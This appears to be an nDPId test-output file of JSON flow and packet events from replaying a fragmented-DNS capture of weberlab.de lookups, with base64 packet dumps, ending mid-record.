00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
00645{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":264,"pkt_l4_len":0,"thread_ts_msec":1558968008021,"pkt":"AIac51UUAAwpil3XCABFAAD60P4AuUARLg\/BGOPurNkoTJJWaQ8FS9tIHo+oVjY51cy6+fgiJNB2zCSb2h1J8D40RJyUZYc0lguNGrMzvogBYnbxInuDKD2B8SGaumxsynJulBSZTde74knucmk+7g4DbM0zyfRD0W3RhD3u0NFdji\/0zmiI817VkCE2GpVvuL3F8KDCC+EMYjJlOHqM+STJxPq9ZF8xJcVITkC6EY6CdRmYmQdqvRYWzDXPjGtyu5XT13H1VC8IJisNUehBDr2PeppANUdXFlyqVQ6mARL6UnTBT0xam7DpmuxycO7BOql2rC7KBJb4lykg9AAAKRAAAACAAAAA"} 00631{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":264,"pkt_l4_len":0,"thread_ts_msec":1558968008021,"pkt":"AIac51UUAAwpil3XCABFAAD60P4AuUARLg\/BGOPurNkoTJJWaQ8FS9tIHo+oVjY51cy6+fgiJNB2zCSb2h1J8D40RJyUZYc0lguNGrMzvogBYnbxInuDKD2B8SGaumxsynJulBSZTde74knucmk+7g4DbM0zyfRD0W3RhD3u0NFdji\/0zmiI817VkCE2GpVvuL3F8KDCC+EMYjJlOHqM+STJxPq9ZF8xJcVITkC6EY6CdRmYmQdqvRYWzDXPjGtyu5XT13H1VC8IJisNUehBDr2PeppANUdXFlyqVQ6mARL6UnTBT0xam7DpmuxycO7BOql2rC7KBJb4lykg9AAAKRAAAACAAAAA"}
00223{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":3,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":230,"global_ts_msec":1558968008021} 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":230,"global_ts_msec":1558968008021}
00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968010233,"flow_last_seen":1558968010233,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1558968010233,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968010233,"flow_last_seen":1558968010233,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1558968010233,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1558968010233,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":120,"pkt_l4_len":66,"thread_ts_msec":1558968010233,"pkt":"AAwpil3XAIac51UUht1gArj8AEIRayoAFFBAEwwDAAAAAAAAAQogAQRwdlsAAAAAAAAKJQBTtWEANQBC7JLpxAAQAAEAAAAAAAECcGEId2ViZXJsYWICZGUAABwAAQAAKRAAAACAAAAPAAgACwACOAAgAQRwHwsW"} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1558968010233,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":120,"pkt_l4_len":66,"thread_ts_msec":1558968010233,"pkt":"AAwpil3XAIac51UUht1gArj8AEIRayoAFFBAEwwDAAAAAAAAAQogAQRwdlsAAAAAAAAKJQBTtWEANQBC7JLpxAAQAAEAAAAAAAECcGEId2ViZXJsYWICZGUAABwAAQAAKRAAAACAAAAPAAgACwACOAAgAQRwHwsW"}
00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968010233,"flow_last_seen":1558968010233,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1558968010233,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pa.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968010233,"flow_last_seen":1558968010233,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1558968010233,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pa.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1558968010234,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1510,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":1510,"pkt_l4_len":1448,"thread_ts_msec":1558968010234,"pkt":"AIac51UUAAwpil3Xht1gB4f9BbAsQCABBHB2WwAAAAAAAAolAFMqABRQQBMMAwAAAAAAAAEKEQAAAShAPAsANbVhBeUUjunEhBAAAQACAAMACQJwYQh3ZWJlcmxhYgJkZQAAHAABwAwAHAABAAAAPAAQIAEEcB8LECQAAAAAAAAAAsAMAC4AAQAAADwBHwAcCgMAAAA8XQZZ\/FzevuyQRwh3ZWJlcmxhYgJkZQC1pnXN9aJB47xcEl0t+RyJPr\/p+1OSRyBEPleyPVcVG13SY1au\/jvJTdnRA4lySA7r3bi4LlJCEattffR4fjevK4f+NrGd0s5mJ+PRg85+C1QnHQmbvL9v+MI2zPL2z8n5PSX3Yf1y4VNvPCJ7YmzWzkyABQys7VcUh58r0Vf2MDfcX+p\/oqdfN5wH3piEMrifXVk3S1jvEgqm3k\/0jIc5bfsXYFPDiziLSsKruSCkr5Ydv6DPypeAQh8lSdezjVxYVAOnbrtC88Q7QQ04+1dWXmZGW9cG+PBKFrFDsPDKsCvsJ0ggc3+bJXpyZZ0SaqfH4Zgi8NjO\/iMCsrSxLkS9wFoAAgABAAAAPAAPA25zMgh3ZWJlcmRuc8BjwFoAAgABAAAAPAAGA25zMcF3wFoALgABAAAAPAEfAAIKAgAAADxdCgDsXOJvNZBHCHdlYmVybGFiAmRlAHSoxNqqAKym4hw9iI9\/cGB9AOyri1gZ9PRCVa3kokohNFwwgJZHh\/GYLEe5aVQ16NDPaZsaEDNFKVzAqyIPhTpD66im4JiAdIma3+zQ6MM9+50XgE4zD34pXPziEN3\/hpyx0OsRaMDdi+fLJ+VSFGsK+dEf7olAlTzREwS8gAhMxbir6bK5GyMP0HpB+N56qoJQqvHlvC11N4HQ1PiAfHGM\/e0cnoTP4HtNoJs4zlO01ipMUjuZ2yl3aHqydGgSm9jswrVneievkN6cP9\/osHneUEe3pq+Na767DBQ6GotyiL0ifYjqRt+tp11FZgz+RwhCI599k5mxFSecocr80szBjgAcAAEAAA4QABAgAQRwdlsAAAAAAAAKJQBTwXMAHAABAAAOEAAQIAEEcB8LFrAAAAAACiYAU8GOAAEAAQAADhAABMEY4+7BcwABAAEAAA4QAATC9wUOwY4ALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALFKzqMjh9BzTzk7te1fsFGook8hWPtH0Dh2qeLmkPiC00JY45Dj2PARXv44katX35tAeXg4ix8QZs+c1GIcPatTaDXZe6J7CgZjoERP+ecNOmJ3vNLtj8s3UGq5X1b66ao4qdZN6E8DXjYpPWxeaD+6KZd7ytQjBmRNzONHV4CNwY4ALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAEEPt\/jvpNYZTaxUf\/hq3Z6tUps6XBA9Yu325Bwy3LukMjtOntkxZ48rvFNij79Ioq3EbGxCb4PD0EVLtA5lKR6U69jYrdbsh11ahmIq4c0voBJAKVJkpfioqYTXkZCppD5DWEnFc7+3dmCZtR6n7cdLRMGXeU0ee7boqf+ntG0ywXMALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAAdbeEFbg2lg4i3rnV+6yQt2VeYizGmT\/rDt7rXbe9Gvg0bs7cCzKvh3nLNc7lfkw3Toxu3h2m\/NqvAJNkxLRmrtfxw68cyy4lkHhL2NLL3Y19jvp2qm25mZVgwcJylB9Dlvk0ReqgeiL8E1GyKZ+bYJb4PW+X45ewaJrdYFgGv4wXMALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALY71RRfBids18YMqfb3pDV95vjCv9gQTwdXg7KIz9hcjsWC4LdX4rCK4Rics7xQ5QaBNODVJNd5alz0R5hMDerxbEpzVvoggNs6EwCYRezdSpP5C3DJFx6i88C2SQ=="} 02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1558968010234,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1510,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":1510,"pkt_l4_len":1448,"thread_ts_msec":1558968010234,"pkt":"AIac51UUAAwpil3Xht1gB4f9BbAsQCABBHB2WwAAAAAAAAolAFMqABRQQBMMAwAAAAAAAAEKEQAAAShAPAsANbVhBeUUjunEhBAAAQACAAMACQJwYQh3ZWJlcmxhYgJkZQAAHAABwAwAHAABAAAAPAAQIAEEcB8LECQAAAAAAAAAAsAMAC4AAQAAADwBHwAcCgMAAAA8XQZZ\/FzevuyQRwh3ZWJlcmxhYgJkZQC1pnXN9aJB47xcEl0t+RyJPr\/p+1OSRyBEPleyPVcVG13SY1au\/jvJTdnRA4lySA7r3bi4LlJCEattffR4fjevK4f+NrGd0s5mJ+PRg85+C1QnHQmbvL9v+MI2zPL2z8n5PSX3Yf1y4VNvPCJ7YmzWzkyABQys7VcUh58r0Vf2MDfcX+p\/oqdfN5wH3piEMrifXVk3S1jvEgqm3k\/0jIc5bfsXYFPDiziLSsKruSCkr5Ydv6DPypeAQh8lSdezjVxYVAOnbrtC88Q7QQ04+1dWXmZGW9cG+PBKFrFDsPDKsCvsJ0ggc3+bJXpyZZ0SaqfH4Zgi8NjO\/iMCsrSxLkS9wFoAAgABAAAAPAAPA25zMgh3ZWJlcmRuc8BjwFoAAgABAAAAPAAGA25zMcF3wFoALgABAAAAPAEfAAIKAgAAADxdCgDsXOJvNZBHCHdlYmVybGFiAmRlAHSoxNqqAKym4hw9iI9\/cGB9AOyri1gZ9PRCVa3kokohNFwwgJZHh\/GYLEe5aVQ16NDPaZsaEDNFKVzAqyIPhTpD66im4JiAdIma3+zQ6MM9+50XgE4zD34pXPziEN3\/hpyx0OsRaMDdi+fLJ+VSFGsK+dEf7olAlTzREwS8gAhMxbir6bK5GyMP0HpB+N56qoJQqvHlvC11N4HQ1PiAfHGM\/e0cnoTP4HtNoJs4zlO01ipMUjuZ2yl3aHqydGgSm9jswrVneievkN6cP9\/osHneUEe3pq+Na767DBQ6GotyiL0ifYjqRt+tp11FZgz+RwhCI599k5mxFSecocr80szBjgAcAAEAAA4QABAgAQRwdlsAAAAAAAAKJQBTwXMAHAABAAAOEAAQIAEEcB8LFrAAAAAACiYAU8GOAAEAAQAADhAABMEY4+7BcwABAAEAAA4QAATC9wUOwY4ALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALFKzqMjh9BzTzk7te1fsFGook8hWPtH0Dh2qeLmkPiC00JY45Dj2PARXv44katX35tAeXg4ix8QZs+c1GIcPatTaDXZe6J7CgZjoERP+ecNOmJ3vNLtj8s3UGq5X1b66ao4qdZN6E8DXjYpPWxeaD+6KZd7ytQjBmRNzONHV4CNwY4ALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAEEPt\/jvpNYZTaxUf\/hq3Z6tUps6XBA9Yu325Bwy3LukMjtOntkxZ48rvFNij79Ioq3EbGxCb4PD0EVLtA5lKR6U69jYrdbsh11ahmIq4c0voBJAKVJkpfioqYTXkZCppD5DWEnFc7+3dmCZtR6n7cdLRMGXeU0ee7boqf+ntG0ywXMALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAAdbeEFbg2lg4i3rnV+6yQt2VeYizGmT\/rDt7rXbe9Gvg0bs7cCzKvh3nLNc7lfkw3Toxu3h2m\/NqvAJNkxLRmrtfxw68cyy4lkHhL2NLL3Y19jvp2qm25mZVgwcJylB9Dlvk0ReqgeiL8E1GyKZ+bYJb4PW+X45ewaJrdYFgGv4wXMALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALY71RRfBids18YMqfb3pDV95vjCv9gQTwdXg7KIz9hcjsWC4LdX4rCK4Rics7xQ5QaBNODVJNd5alz0R5hMDerxbEpzVvoggNs6EwCYRezdSpP5C3DJFx6i88C2SQ=="}
00810{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968010233,"flow_last_seen":1558968010234,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1498,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1558968010234,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pa.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 00810{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968010233,"flow_last_seen":1558968010234,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1498,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1558968010234,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pa.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}}
00457{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":6,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":123,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":123,"pkt_l4_len":0,"thread_ts_msec":1558968010234,"pkt":"AIac51UUAAwpil3Xht1gB4f9AEUsQCABBHB2WwAAAAAAAAolAFMqABRQQBMMAwAAAAAAAAEKEQAFqChAPAtderZqHOphjXllMk8sHswGkSaaDoR\/AL9bqSnISQXKcnns5gAAKRAAAACAAAAPAAgACwACOAAgAQRwHwsW"} 00443{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":123,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":123,"pkt_l4_len":0,"thread_ts_msec":1558968010234,"pkt":"AIac51UUAAwpil3Xht1gB4f9AEUsQCABBHB2WwAAAAAAAAolAFMqABRQQBMMAwAAAAAAAAEKEQAFqChAPAtderZqHOphjXllMk8sHswGkSaaDoR\/AL9bqSnISQXKcnns5gAAKRAAAACAAAAPAAgACwACOAAgAQRwHwsW"}
00223{"basic_event_id":12,"basic_event_name":"nDPI IPv6\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":6,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":89,"global_ts_msec":1558968010234} 00209{"basic_event_id":12,"basic_event_name":"nDPI IPv6\/L4 payload detection failed","datalink":1,"packet_id":6,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":89,"global_ts_msec":1558968010234}
00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968018074,"flow_last_seen":1558968018074,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968018074,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968018074,"flow_last_seen":1558968018074,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968018074,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1558968018074,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":121,"pkt_l4_len":67,"thread_ts_msec":1558968018074,"pkt":"AAwpil3XAIac51UUht1gCQGuAEMRayoAFFBAEwwGAAAAAAAAAQUgAQRwdlsAAAAAAAAKJQBT94kANQBDODsKMgAQAAEAAAAAAAEDZmcyCHdlYmVybGFiAmRlAAABAAEAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1558968018074,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":121,"pkt_l4_len":67,"thread_ts_msec":1558968018074,"pkt":"AAwpil3XAIac51UUht1gCQGuAEMRayoAFFBAEwwGAAAAAAAAAQUgAQRwdlsAAAAAAAAKJQBT94kANQBDODsKMgAQAAEAAAAAAAEDZmcyCHdlYmVybGFiAmRlAAABAAEAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="}
00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968018074,"flow_last_seen":1558968018074,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968018074,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968018074,"flow_last_seen":1558968018074,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968018074,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1558968018075,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1510,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":1510,"pkt_l4_len":1448,"thread_ts_msec":1558968018075,"pkt":"AIac51UUAAwpil3Xht1gAmIVBbAsQCABBHB2WwAAAAAAAAolAFMqABRQQBMMBgAAAAAAAAEFEQAAASR\/DLMANfeJBdraSAoyhBAAAQACAAMACQNmZzIId2ViZXJsYWICZGUAAAEAAcAMAAEAAQAAADwABML3BArADAAuAAEAAAA8AR8AAQoDAAAAPF0J+51c4m0NkEcId2ViZXJsYWICZGUATmqKLyXYlD7oC1wjnJdPzxr55pJoGn6h+biEYxUlvjgkAKYGVr2OkUzNi9dPZZCT1\/wXWro5BadVhTNlYhGA9J99DHUUB5NEITFfyeoCqRwORKOIN8F3N4260XT5uRwPgDtpnX9J6IRQN3Hg639ASVUfreGkxN2At0j1oxD21UcoFDfwz5Fn7owm5vE3RP6EyTqHCPkRSCJvvZO+Lb6nyRwRS\/BgbrTAjIDB9gxMtXs7GIKlm\/T21iqqa\/CM0K3y9nYSv2Mbgyh+nhDaTp4WmMKZfRzP6DKGL+Myx7893ekGgWnaQNeZGzB3BTQVSEJFLULyYavsqtvSpVIspLF1IcBPAAIAAQAAADwADwNuczIId2ViZXJkbnPAWMBPAAIAAQAAADwABgNuczHBbMBPAC4AAQAAADwBHwACCgIAAAA8XQoA7FzibzWQRwh3ZWJlcmxhYgJkZQB0qMTaqgCspuIcPYiPf3BgfQDsq4tYGfT0QlWt5KJKITRcMICWR4fxmCxHuWlUNejQz2mbGhAzRSlcwKsiD4U6Q+uopuCYgHSJmt\/s0OjDPfudF4BOMw9+KVz84hDd\/4acsdDrEWjA3YvnyyflUhRrCvnRH+6JQJU80RMEvIAITMW4q+myuRsjD9B6QfjeeqqCUKrx5bwtdTeB0NT4gHxxjP3tHJ6Ez+B7TaCbOM5TtNYqTFI7mdspd2h6snRoEpvY7MK1Z3onr5DenD\/f6LB53lBHt6avjWu+uwwUOhqLcoi9In2I6kbfraddRWYM\/kcIQiOffZOZsRUnnKHK\/NLMwYMAHAABAAAOEAAQIAEEcHZbAAAAAAAACiUAU8FoABwAAQAADhAAECABBHAfCxawAAAAAAomAFPBgwABAAEAAA4QAATBGOPuwWgAAQABAAAOEAAEwvcFDsGDAC4AAQAADhAAnwABCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQCxSs6jI4fQc085O7XtX7BRqKJPIVj7R9A4dqni5pD4gtNCWOOQ49jwEV7+OJGrV9+bQHl4OIsfEGbPnNRiHD2rU2g12XuiewoGY6BET\/nnDTpid7zS7Y\/LN1BquV9W+umqOKnWTehPA142KT1sXmg\/uimXe8rUIwZkTczjR1eAjcGDAC4AAQAADhAAnwAcCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQBBD7f476TWGU2sVH\/4at2erVKbOlwQPWLt9uQcMty7pDI7Tp7ZMWePK7xTYo+\/SKKtxGxsQm+Dw9BFS7QOZSkelOvY2K3W7IddWoZiKuHNL6ASQClSZKX4qKmE15GQqaQ+Q1hJxXO\/t3ZgmbUep+3HS0TBl3lNHnu26Kn\/p7RtMsFoAC4AAQAADhAAnwABCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQAHW3hBW4NpYOIt651fuskLdlXmIsxpk\/6w7e6123vRr4NG7O3Asyr4d5yzXO5X5MN06Mbt4dpvzarwCTZMS0Zq7X8cOvHMsuJZB4S9jSy92NfY76dqptuZmVYMHCcpQfQ5b5NEXqoHoi\/BNRsimfm2CW+D1vl+OXsGia3WBYBr+MFoAC4AAQAADhAAnwAcCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQC2O9UUXwYnbNfGDKn296Q1feb4wr\/YEE8HV4OyiM\/YXI7FguC3V+KwiuEYnLO8UOUGgTTg1STXeWpc9EeYTA3q8WxKc1b6IIDbOhMAmEXs3UqT+QtwyRceovPAtklderZqHOphjXllMg=="} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1558968018075,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1510,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":1510,"pkt_l4_len":1448,"thread_ts_msec":1558968018075,"pkt":"AIac51UUAAwpil3Xht1gAmIVBbAsQCABBHB2WwAAAAAAAAolAFMqABRQQBMMBgAAAAAAAAEFEQAAASR\/DLMANfeJBdraSAoyhBAAAQACAAMACQNmZzIId2ViZXJsYWICZGUAAAEAAcAMAAEAAQAAADwABML3BArADAAuAAEAAAA8AR8AAQoDAAAAPF0J+51c4m0NkEcId2ViZXJsYWICZGUATmqKLyXYlD7oC1wjnJdPzxr55pJoGn6h+biEYxUlvjgkAKYGVr2OkUzNi9dPZZCT1\/wXWro5BadVhTNlYhGA9J99DHUUB5NEITFfyeoCqRwORKOIN8F3N4260XT5uRwPgDtpnX9J6IRQN3Hg639ASVUfreGkxN2At0j1oxD21UcoFDfwz5Fn7owm5vE3RP6EyTqHCPkRSCJvvZO+Lb6nyRwRS\/BgbrTAjIDB9gxMtXs7GIKlm\/T21iqqa\/CM0K3y9nYSv2Mbgyh+nhDaTp4WmMKZfRzP6DKGL+Myx7893ekGgWnaQNeZGzB3BTQVSEJFLULyYavsqtvSpVIspLF1IcBPAAIAAQAAADwADwNuczIId2Vi